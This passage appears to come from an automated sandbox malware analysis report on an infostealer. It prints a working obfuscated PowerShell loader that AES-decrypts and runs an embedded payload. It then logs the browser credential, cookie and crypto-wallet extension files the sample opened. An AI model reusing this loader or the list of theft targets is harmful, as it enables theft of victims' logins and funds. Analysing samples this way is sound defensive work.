aa=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((esnny('49446f52676d7356434761614a6e6878')),[byte[]]::new(16)).transformfinalblock($lqmb,0,$lqmb.length)); & $jamaa.substring(0,3) $jamaa.substring(129)
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function esnny($mavcz){return -split ($mavcz -replace '..', '0x$& ')};$lqmb = esnny('5c3f827bac65b5d2c8965d0bbce1ed07b9b6786a8751f026d08efd0a825f531a8d091c0ecdd11b3934b46c626b865735bab41b512be15de11f5e12515f7078b31ee8399c0e805b1f986b48cd1fe4a4708fa30b93ca4f7e812ca54a8793d62d3598e2b95af0842b9c9750010609af477848f4d131b954661400575166055c03ef1b5de596cf55c542063d3f91ce19ce97925e58f6c32246a890129f4332d50885100c3526774d0074eec5d7a612d64456e89e2aad35e8f4dcb634817b8f6e0ac4fa605341c50069355f250adb57d33d199e78edcf80294758e47cb522edfffe73cc1b919ef16af41e32f5b6a9bf909ae30ceb1071e2d14015fb77f6298ff2b02feba7b2bee205f03cf88ff6f6bebeec0309a6d27d56500b79add62dd9d50a9590f07c9425ff02c2062f0e3444952489ce539fe357b044d8f72560487a102cc157f9e4e5b39d9c8def45655607c7a2fdb595ecbd612595fe995c4b043f8955a8f51fb018d2638c4f3a04e4ce1f6f77607e28264761f8517127e32f9f8d159565861f352d53ed7157874f263f52a7e1025a408cacc8b208e7f7776300701055fd3d6c30ca49783c822471e5b37491da64e22eca5aceae2c26465a1465f8774b5536298c89dbc028cd0ae43dbabb7b1179bd528ca17b1c6d0b390408ece7927feaa32ea4faf5b6249a55c0bb8fce630bbe9577950a1c82ceb3f5b1cc3b4d16d0dd85009c2c1593600e9ad124bd3e71f96e9ecc581d41a94b73c3a20bf4550fa7e08728a080d7a6a09ff218a0a37cdf4ef3f6a50ccc9ddee0d24287949b372601ca8769a11092428566941e5e81dc734a344a92e5b54939a7b808ea27414a69bece50356ada32af76c66a7eed81ff79a3208ea6ca1e28d54700ab34fb6270b5b4ec13da50ebf0b9bbab023861142203272d6112a5a6d9726b68ef794031846478bc822c4c0391f73ad6dd169dcdf33d909e115bcfb9021a0d74abb583032ac14edaf563eb221f82dbe70815740f8f4f65b3993b4805f2f8ded176ef03650d5ba2d74e1919becb701a86b2332083bfbe1c6d8903ab78e68721c77f780c3596edc51e77');$jamaa=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((esnny('49446f52676d7356434761614a6e6878')),[byte[]]::new(16)).transformfinalblock($lqmb,0,$lqmb.length)); & $jamaa.substring(0,3) $jamaa.substring(129)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: powershell.exe, 0000000C.00000002.2806243340.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: powershell.exe, 00000000.00000002.1709546861.00007FFD9B9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
